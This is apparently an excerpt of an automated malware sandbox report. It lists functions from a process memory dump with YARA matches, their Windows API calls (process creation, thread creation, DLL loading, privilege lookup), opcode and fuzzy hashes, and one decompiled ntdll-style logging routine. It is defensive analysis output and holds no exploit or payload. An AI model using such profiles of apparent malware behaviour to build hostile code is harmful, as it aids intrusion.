                                                      • Instruction Fuzzy Hash: FCE046B1200208ABDB14EF99DC41EA777ADEF88750F118559FE095B242C630F910CBF0
                                                      Uniqueness

                                                      Uniqueness Score: -1.00%

                                                      Function 0063A230, Relevance: 3.5, APIs: 1, Strings: 1, Instructions: 24memoryCOMMON
                                                      Download Yara Rule
                                                      APIs
                                                      • RtlFreeHeap.NTDLL(00000060,00000000,.z`,007A002E,00000000,00000060,00000000,00000000,?,?,00700069,?,00623AF8), ref: 0063A25D
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 00000005.00000002.598821666.0000000000620000.00000040.00000001.sdmp, Offset: 00620000, based on PE: false
                                                      Yara matches
                                                      Similarity
                                                      • API ID: FreeHeap
                                                      • String ID: .z`
                                                      • API String ID: 3298025750-1441809116
                                                      • Opcode ID: 540c4433df045b48126259b9153db85e530e9dd1f040c1eb84158749b6bc4ef9
                                                      • Instruction ID: 65656247728a4f82a1a98022f4175269308eb8503262be38b4d75bb9d81d3cd7
                                                      • Opcode Fuzzy Hash: 540c4433df045b48126259b9153db85e530e9dd1f040c1eb84158749b6bc4ef9
                                                      • Instruction Fuzzy Hash: 5CE046B1200208ABDB18EF99DC49EA777ADEF88750F018559FE095B242C630F910CBF0
                                                      Uniqueness

                                                      Uniqueness Score: -1.00%

                                                      Function 0063A234, Relevance: 3.5, APIs: 1, Strings: 1, Instructions: 19memoryCOMMON
                                                      Download Yara Rule
                                                      APIs
                                                      • RtlFreeHeap.NTDLL(00000060,00000000,.z`,007A002E,00000000,00000060,00000000,00000000,?,?,00700069,?,00623AF8), ref: 0063A25D
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 00000005.00000002.598821666.0000000000620000.00000040.00000001.sdmp, Offset: 00620000, based on PE: false
                                                      Yara matches
                                                      Similarity
                                                      • API ID: FreeHeap
                                                      • String ID: .z`
                                                      • API String ID: 3298025750-1441809116
                                                      • Opcode ID: 6a59504d4e3b580197e0f7cceaea976dee2c66138c05c7347ccb5f4163336edb
                                                      • Instruction ID: 2e66b774a4df23d0c6dd46ab849c3757cd7d6fe5049118a703b10edd0918bbc7
                                                      • Opcode Fuzzy Hash: 6a59504d4e3b580197e0f7cceaea976dee2c66138c05c7347ccb5f4163336edb
                                                      • Instruction Fuzzy Hash: 8AD02BB81042845BDB10EF69E8C089B77D5BF803147108A4AFC9D47303C130D8198BB1
                                                      Uniqueness

                                                      Uniqueness Score: -1.00%

                                                      Function 006282E8, Relevance: 3.1, APIs: 2, Instructions: 57threadwindowCOMMON
                                                      Download Yara Rule
                                                      APIs
                                                      • PostThreadMessageW.USER32(0065002E,00000111,00000000,00000000,00000000), ref: 0062834A
                                                      • PostThreadMessageW.USER32(0065002E,00008003,00000000,?,00000000), ref: 0062836B
                                                      Memory Dump Source
                                                      • Source File: 00000005.00000002.598821666.0000000000620000.00000040.00000001.sdmp, Offset: 00620000, based on PE: false
                                                      Yara matches
                                                      Similarity
                                                      • API ID: MessagePostThread
                                                      • String ID:
                                                      • API String ID: 1836367815-0
                                                      • Opcode ID: fbc16a511511f40714f8509eb2c391b8a4e9c1bf39cca2c802e3e3c43d4591e2
                                                      • Instruction ID: 006fdd4dab12c0513e359e694faca413e06d168b7ee816b62845aaa883d493c9
                                                      • Opcode Fuzzy Hash: fbc16a511511f40714f8509eb2c391b8a4e9c1bf39cca2c802e3e3c43d4591e2
                                                      • Instruction Fuzzy Hash: FD012D32A406347BE721A6949C43FFE776D6F51B10F144009FB04BB1C1D6D479054BE5
                                                      Uniqueness

                                                      Uniqueness Score: -1.00%

                                                      Function 006282F0, Relevance: 3.1, APIs: 2, Instructions: 55threadwindowCOMMON
                                                      Download Yara Rule
                                                      APIs
                                                      • PostThreadMessageW.USER32(0065002E,00000111,00000000,00000000,00000000), ref: 0062834A
                                                      • PostThreadMessageW.USER32(0065002E,00008003,00000000,?,00000000), ref: 0062836B
                                                      Memory Dump Source
                                                      • Source File: 00000005.00000002.598821666.0000000000620000.00000040.00000001.sdmp, Offset: 00620000, based on PE: false
                                                      Yara matches
                                                      Similarity
                                                      • API ID: MessagePostThread
                                                      • String ID:
                                                      • API String ID: 1836367815-0
                                                      • Opcode ID: 29a892fc29f7ae1cc7dcf0d9980a4ef5a3648e613fbd5d957af854e8297cf94a
                                                      • Instruction ID: ba9708e2a2f8f2a32ad965e951e2d6dd933d78218ece722f44caaf5af9a5c9bc
                                                      • Opcode Fuzzy Hash: 29a892fc29f7ae1cc7dcf0d9980a4ef5a3648e613fbd5d957af854e8297cf94a
                                                      • Instruction Fuzzy Hash: D6018431A806287BE720A6959C03FFE776D6B40B51F044118FB04BA1C1EAD4790546EA
                                                      Uniqueness

                                                      Uniqueness Score: -1.00%

                                                      Function 00628373, Relevance: 3.0, APIs: 2, Instructions: 46threadwindowCOMMON
                                                      Download Yara Rule
                                                      APIs
                                                      • PostThreadMessageW.USER32(0065002E,00000111,00000000,00000000,00000000), ref: 0062834A
                                                      • PostThreadMessageW.USER32(0065002E,00008003,00000000,?,00000000), ref: 0062836B
                                                      Memory Dump Source
                                                      • Source File: 00000005.00000002.598821666.0000000000620000.00000040.00000001.sdmp, Offset: 00620000, based on PE: false
                                                      Yara matches
                                                      Similarity
                                                      • API ID: MessagePostThread
                                                      • String ID:
                                                      • API String ID: 1836367815-0
                                                      • Opcode ID: c0c426cb3ea28ce7e549d0049a8b3efb4b3a4d38edc75c75df3c0cdb56d1835f
                                                      • Instruction ID: 2500395dd35ea3c597911c46924a0590c10655e1f64116726f4b4e4cd7cf22c9
                                                      • Opcode Fuzzy Hash: c0c426cb3ea28ce7e549d0049a8b3efb4b3a4d38edc75c75df3c0cdb56d1835f
                                                      • Instruction Fuzzy Hash: D3F0FC31A41A393AE71076945C02FFE77596B40F21F154259FE04BB2C2E9D479050AE9
                                                      Uniqueness

                                                      Uniqueness Score: -1.00%

                                                      Function 006282B3, Relevance: 3.0, APIs: 2, Instructions: 41threadwindowCOMMON
                                                      Download Yara Rule
                                                      APIs
                                                      • PostThreadMessageW.USER32(0065002E,00000111,00000000,00000000,00000000), ref: 0062834A
                                                      • PostThreadMessageW.USER32(0065002E,00008003,00000000,?,00000000), ref: 0062836B
                                                      Memory Dump Source
                                                      • Source File: 00000005.00000002.598821666.0000000000620000.00000040.00000001.sdmp, Offset: 00620000, based on PE: false
                                                      Yara matches
                                                      Similarity
                                                      • API ID: MessagePostThread
                                                      • String ID:
                                                      • API String ID: 1836367815-0
                                                      • Opcode ID: efa41587afe4398dddb1ab0705e8c48b63e135a456b523d24b96751b8ed50aa0
                                                      • Instruction ID: ef93e40c1b25d1f4b1860c4ea0ed96791798bc51ff6e6210c5b8bdf064343b56
                                                      • Opcode Fuzzy Hash: efa41587afe4398dddb1ab0705e8c48b63e135a456b523d24b96751b8ed50aa0
                                                      • Instruction Fuzzy Hash: 2BF0A731B81A343BE620A6D46C43FFE625E6B40F11F154119FF04FA2C1EAD579060AF9
                                                      Uniqueness

                                                      Uniqueness Score: -1.00%

                                                      Function 0062ACC0, Relevance: 1.5, APIs: 1, Instructions: 48libraryloaderCOMMON
                                                      Download Yara Rule
                                                      APIs
                                                      • LdrLoadDll.NTDLL(00000000,00000000,00000003,?), ref: 0062AD32
                                                      Memory Dump Source
                                                      • Source File: 00000005.00000002.598821666.0000000000620000.00000040.00000001.sdmp, Offset: 00620000, based on PE: false
                                                      Yara matches
                                                      Similarity
                                                      • API ID: Load
                                                      • String ID:
                                                      • API String ID: 2234796835-0
                                                      • Opcode ID: 4e7e6ba31bbc1c6f731b244d46290ada3a087f6c5bf953407071256f7589dc13
                                                      • Instruction ID: 3de8da144bbef9a5471b3ae65e0e5c61be99a8c126cec62ae5ab1be442d70c45
                                                      • Opcode Fuzzy Hash: 4e7e6ba31bbc1c6f731b244d46290ada3a087f6c5bf953407071256f7589dc13
                                                      • Instruction Fuzzy Hash: D7015EB5E0020DABDB10DAE4EC42FDEB3B99B14308F004599B908A7241F671EB04CB91
                                                      Uniqueness

                                                      Uniqueness Score: -1.00%

                                                      Function 0063A2A0, Relevance: 1.5, APIs: 1, Instructions: 42processCOMMON
                                                      Download Yara Rule
                                                      APIs
                                                      • CreateProcessInternalW.KERNELBASE(?,00000000,?,?,00000000,00000000,?,?,?,00000000,00000000,?,?,00000000,?,00000000), ref: 0063A2F4
                                                      Memory Dump Source
                                                      • Source File: 00000005.00000002.598821666.0000000000620000.00000040.00000001.sdmp, Offset: 00620000, based on PE: false
                                                      Yara matches
                                                      Similarity
                                                      • API ID: CreateInternalProcess
                                                      • String ID:
                                                      • API String ID: 2186235152-0
                                                      • Opcode ID: 91c10d5b09b6f5ff7ee6d1e22534128eefdcfa4a5b7191d55d386dbf4554461c
                                                      • Instruction ID: f0ad98d870bf0d57a3cdb3d1e77c461cc870edbd507e9ef5abf58053fb6315f9
                                                      • Opcode Fuzzy Hash: 91c10d5b09b6f5ff7ee6d1e22534128eefdcfa4a5b7191d55d386dbf4554461c
                                                      • Instruction Fuzzy Hash: 2C01AFB2210108ABCB54DF89DC80EEB77AEAF8C754F158258BA0D97241C630E851CBA4
                                                      Uniqueness

                                                      Uniqueness Score: -1.00%

                                                      Function 0063A29E, Relevance: 1.5, APIs: 1, Instructions: 41processCOMMON
                                                      Download Yara Rule
                                                      APIs
                                                      • CreateProcessInternalW.KERNELBASE(?,00000000,?,?,00000000,00000000,?,?,?,00000000,00000000,?,?,00000000,?,00000000), ref: 0063A2F4
                                                      Memory Dump Source
                                                      • Source File: 00000005.00000002.598821666.0000000000620000.00000040.00000001.sdmp, Offset: 00620000, based on PE: false
                                                      Yara matches
                                                      Similarity
                                                      • API ID: CreateInternalProcess
                                                      • String ID:
                                                      • API String ID: 2186235152-0
                                                      • Opcode ID: 0a5e4659c1c7dea58745958aad34a6bf333a2b57697f7689caea92844f800d10
                                                      • Instruction ID: fdc2067854ecc54a5f8ca1c0b2130ab942d4cb73adde8109878957a6f61ea26f
                                                      • Opcode Fuzzy Hash: 0a5e4659c1c7dea58745958aad34a6bf333a2b57697f7689caea92844f800d10
                                                      • Instruction Fuzzy Hash: 6B01F2B2204148ABCB44DF98DC80DEB7BAAAF8C314F15825CFA9997201C630E841CBA4
                                                      Uniqueness

                                                      Uniqueness Score: -1.00%

                                                      Function 00638D70, Relevance: 1.5, APIs: 1, Instructions: 36threadCOMMON
                                                      Download Yara Rule
                                                      APIs
                                                      • CreateThread.KERNELBASE(00000000,00000000,-00000002,?,00000000,00000000,?,?,0062F010,?,?,00000000), ref: 00638DAC
                                                      Memory Dump Source
                                                      • Source File: 00000005.00000002.598821666.0000000000620000.00000040.00000001.sdmp, Offset: 00620000, based on PE: false
                                                      Yara matches
                                                      Similarity
                                                      • API ID: CreateThread
                                                      • String ID:
                                                      • API String ID: 2422867632-0
                                                      • Opcode ID: 0492dd52497a697f2125d76e48c7ee170aee05726da811e9b98eccb8e968774a
                                                      • Instruction ID: 31a6176367a5b3cef598b33b0f688a0c9686716ace8805fc14616b6c16d7e43d
                                                      • Opcode Fuzzy Hash: 0492dd52497a697f2125d76e48c7ee170aee05726da811e9b98eccb8e968774a
                                                      • Instruction Fuzzy Hash: 5FE06D733803043AE3206599AC03FE7B29DDB91B21F55002AFA4DEB2C1D995F80142E8
                                                      Uniqueness

                                                      Uniqueness Score: -1.00%

                                                      Function 0063A381, Relevance: 1.5, APIs: 1, Instructions: 29COMMON
                                                      Download Yara Rule
                                                      APIs
                                                      • LookupPrivilegeValueW.ADVAPI32(00000000,?,0062F192,0062F192,?,00000000,?,?), ref: 0063A3C0
                                                      Memory Dump Source
                                                      • Source File: 00000005.00000002.598821666.0000000000620000.00000040.00000001.sdmp, Offset: 00620000, based on PE: false
                                                      Yara matches
                                                      Similarity
                                                      • API ID: LookupPrivilegeValue
                                                      • String ID:
                                                      • API String ID: 3899507212-0
                                                      • Opcode ID: 6a70caa816748f34c8a883363f56eee37c47f43847ac3f6b63186bcd1e073914
                                                      • Instruction ID: c4c29aa9e2aac0719fa8aef3131309bfecf9ceaf4ee79a1c387b547e74ee7c1e
                                                      • Opcode Fuzzy Hash: 6a70caa816748f34c8a883363f56eee37c47f43847ac3f6b63186bcd1e073914
                                                      • Instruction Fuzzy Hash: 32E06DB1200218BBCA10EF99DC80EDB37AA9F84710F108565FA096B741C930E850CBF5
                                                      Uniqueness

                                                      Uniqueness Score: -1.00%

                                                      Function 0063A390, Relevance: 1.5, APIs: 1, Instructions: 24COMMON
                                                      Download Yara Rule
                                                      APIs
                                                      • LookupPrivilegeValueW.ADVAPI32(00000000,?,0062F192,0062F192,?,00000000,?,?), ref: 0063A3C0
                                                      Memory Dump Source
                                                      • Source File: 00000005.00000002.598821666.0000000000620000.00000040.00000001.sdmp, Offset: 00620000, based on PE: false
                                                      Yara matches
                                                      Similarity
                                                      • API ID: LookupPrivilegeValue
                                                      • String ID:
                                                      • API String ID: 3899507212-0
                                                      • Opcode ID: c524c4dcdeb286be68a002add1a356f71d86b8c938967e6280f3f61150ebef6a
                                                      • Instruction ID: 03b5c67a67dba3f686430b034ee0af2cb39890c76d60a6cd3f1ecba381bc8c07
                                                      • Opcode Fuzzy Hash: c524c4dcdeb286be68a002add1a356f71d86b8c938967e6280f3f61150ebef6a
                                                      • Instruction Fuzzy Hash: 22E01AB12002086BDB10DF89DC85EE777ADAF88650F018155BA0957241C930E8108BF5
                                                      Uniqueness

                                                      Uniqueness Score: -1.00%

                                                      Function 0063A264, Relevance: 1.5, APIs: 1, Instructions: 21memoryCOMMON
                                                      Download Yara Rule
                                                      APIs
                                                      • RtlAllocateHeap.NTDLL(006344F6,?,?,oLc,?,006344F6,?,?,?,?,?,00000000,00000000,?), ref: 0063A21D
                                                      Memory Dump Source
                                                      • Source File: 00000005.00000002.598821666.0000000000620000.00000040.00000001.sdmp, Offset: 00620000, based on PE: false
                                                      Yara matches
                                                      Similarity
                                                      • API ID: AllocateHeap
                                                      • String ID:
                                                      • API String ID: 1279760036-0
                                                      • Opcode ID: da5d9a1859da918cda5ff183b287d6725098659595e67a65e4b3d82815f626b6
                                                      • Instruction ID: 5e40bfd240eeba814e268dcef8d883289a2576db2b0ba7d9cd6e97d74330d396
                                                      • Opcode Fuzzy Hash: da5d9a1859da918cda5ff183b287d6725098659595e67a65e4b3d82815f626b6
                                                      • Instruction Fuzzy Hash: 46D012F52042449FD710EFA4E8918DB7756AF883147308549F89943702D735D92AAAF1
                                                      Uniqueness

                                                      Uniqueness Score: -1.00%

                                                      Function 0063A405, Relevance: 1.5, APIs: 1, Instructions: 21COMMON
                                                      Download Yara Rule
                                                      APIs
                                                      • LookupPrivilegeValueW.ADVAPI32(00000000,?,0062F192,0062F192,?,00000000,?,?), ref: 0063A3C0
                                                      Memory Dump Source
                                                      • Source File: 00000005.00000002.598821666.0000000000620000.00000040.00000001.sdmp, Offset: 00620000, based on PE: false
                                                      Yara matches
                                                      Similarity
                                                      • API ID: LookupPrivilegeValue
                                                      • String ID:
                                                      • API String ID: 3899507212-0
                                                      • Opcode ID: d5f349ad2854dc30ac00c8f406a5ff6da6b15d06e944a748c7788ffefff8511d
                                                      • Instruction ID: 9119eca1dfd021b2341b5148288996ae22386158c58f550cbcbaefad78e0532d
                                                      • Opcode Fuzzy Hash: d5f349ad2854dc30ac00c8f406a5ff6da6b15d06e944a748c7788ffefff8511d
                                                      • Instruction Fuzzy Hash: 16E012B4104285EBCB10EF78EC91CEBBB6ADF852547158556F84987202C735D920DBF2
                                                      Uniqueness

                                                      Uniqueness Score: -1.00%

                                                      Function 0062F690, Relevance: 1.5, APIs: 1, Instructions: 19COMMON
                                                      Download Yara Rule
                                                      APIs
                                                      • SetErrorMode.KERNELBASE(00008003,?,00628CF4,?), ref: 0062F6BB
                                                      Memory Dump Source
                                                      • Source File: 00000005.00000002.598821666.0000000000620000.00000040.00000001.sdmp, Offset: 00620000, based on PE: false
                                                      Yara matches
                                                      Similarity
                                                      • API ID: ErrorMode
                                                      • String ID:
                                                      • API String ID: 2340568224-0
                                                      • Opcode ID: 7ea49bcfd7eb89cfce1dd1d38e7dcc5e35a49d50de701d0c82c68256bf4518e3
                                                      • Instruction ID: 4bd354006e8555a85de183f4627437006766e42cbba34c5b03a72d26528c95fb
                                                      • Opcode Fuzzy Hash: 7ea49bcfd7eb89cfce1dd1d38e7dcc5e35a49d50de701d0c82c68256bf4518e3
                                                      • Instruction Fuzzy Hash: C2D05E726903042AE610ABA5DC03F667289AB44B00F490474F949AA3C3D950E4004565
                                                      Uniqueness

                                                      Uniqueness Score: -1.00%

                                                      Function 0489967A, Relevance: 1.5, APIs: 1, Instructions: 8libraryCOMMON
                                                      Download Yara Rule
                                                      APIs
                                                      Memory Dump Source
                                                      • Source File: 00000005.00000002.601559435.0000000004830000.00000040.00000001.sdmp, Offset: 04830000, based on PE: true
                                                      • Associated: 00000005.00000002.602371206.000000000494B000.00000040.00000001.sdmp Download File
                                                      • Associated: 00000005.00000002.602383095.000000000494F000.00000040.00000001.sdmp Download File
                                                      Similarity
                                                      • API ID: InitializeThunk
                                                      • String ID:
                                                      • API String ID: 2994545307-0
                                                      • Opcode ID: f7a231309f01cca554ab19f31e417b517bc7148b892aa75f239cc27dab3ed7df
                                                      • Instruction ID: c829dec6b1facb23329ef080b9a75b5298e8169040eccf9415f3afbc76cdeeb8
                                                      • Opcode Fuzzy Hash: f7a231309f01cca554ab19f31e417b517bc7148b892aa75f239cc27dab3ed7df
                                                      • Instruction Fuzzy Hash: 8EB02BB18014C0C5FB01D7600608717394077C0300F17C511D2028390A0778D090F1B1
                                                      Uniqueness

                                                      Uniqueness Score: -1.00%

                                                      Non-executed Functions

                                                      Function 048EFDDA, Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 42COMMON
                                                      Download Yara Rule
                                                      C-Code - Quality: 53%
                                                      			E048EFDDA(intOrPtr* __edx, intOrPtr _a4) {
				void* _t7;
				intOrPtr _t9;
				intOrPtr _t10;
				intOrPtr* _t12;
				intOrPtr* _t13;
				intOrPtr _t14;
				intOrPtr* _t15;

				_t13 = __edx;
				_push(_a4);
				_t14 =  *[fs:0x18];
				_t15 = _t12;
				_t7 = E0489CE00( *__edx,  *((intOrPtr*)(__edx + 4)), 0xff676980, 0xffffffff);
				_push(_t13);
				E048E5720(0x65, 1, "RTL: Enter CriticalSection Timeout (%I64u secs) %d\n", _t7);
				_t9 =  *_t15;
				if(_t9 == 0xffffffff) {
					_t10 = 0;
				} else {
					_t10 =  *((intOrPtr*)(_t9 + 0x14));
				}
				_push(_t10);
				_push(_t15);
				_push( *((intOrPtr*)(_t15 + 0xc)));
				_push( *((intOrPtr*)(_t14 + 0x24)));
				return E048E5720(0x65, 0, "RTL: Pid.Tid %p.%p, owner tid %p Critical Section %p - ContentionCount == %u\n",  *((intOrPtr*)(_t14 + 0x20)));
			}










                                                      0x048efdda
                                                      0x048efde2
                                                      0x048efde5
                                                      0x048efdec
                                                      0x048efdfa
                                                      0x048efdff
                                                      0x048efe0a
                                                      0x048efe0f
                                                      0x048efe17
                                                      0x048efe1e
                                                      0x048efe19
                                                      0x048efe19
                                                      0x048efe19
                                                      0x048efe20
                                                      0x048efe21
                                                      0x048efe22
                                                      0x048efe25
                                                      0x048efe40

                                                      APIs
                                                      • __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 048EFDFA
                                                      Strings
                                                      • RTL: Pid.Tid %p.%p, owner tid %p Critical Section %p - ContentionCount == %u, xrefs: 048EFE2B
                                                      • RTL: Enter CriticalSection Timeout (%I64u secs) %d, xrefs: 048EFE01
                                                      Memory Dump Source
                                                      • Source File: 00000005.00000002.601559435.0000000004830000.00000040.00000001.sdmp, Offset: 04830000, based on PE: true
                                                      • Associated: 00000005.00000002.602371206.000000000494B000.00000040.00000001.sdmp Download File
                                                      • Associated: 00000005.00000002.602383095.000000000494F000.00000040.00000001.sdmp Download File
                                                      Similarity
                                                      • API ID: Unothrow_t@std@@@__ehfuncinfo$??2@
                                                      • String ID: RTL: Enter CriticalSection Timeout (%I64u secs) %d$RTL: Pid.Tid %p.%p, owner tid %p Critical Section %p - ContentionCount == %u
                                                      • API String ID: 885266447-3903918235
                                                      • Opcode ID: e14a2aa8574ec12a2e9b3a2814ad0369bb20bfe4f91d6bdda5ff774a6b2fabb3
                                                      • Instruction ID: 106bff17824e3f7bf3f42ad1b06adf0257c65f46e6a9043d66bf3df10af75d40
                                                      • Opcode Fuzzy Hash: e14a2aa8574ec12a2e9b3a2814ad0369bb20bfe4f91d6bdda5ff774a6b2fabb3
                                                      • Instruction Fuzzy Hash: 63F0FC76604501BFE6201A86DC01F337B5ADB85774F140754F714965D1EAA2FC3097F5
                                                      Uniqueness

                                                      Uniqueness Score: -1.00%